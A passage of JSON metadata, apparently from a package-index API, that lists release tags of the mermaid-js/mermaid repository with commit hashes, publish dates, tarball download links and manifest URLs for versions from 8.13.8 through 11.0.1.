-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","mani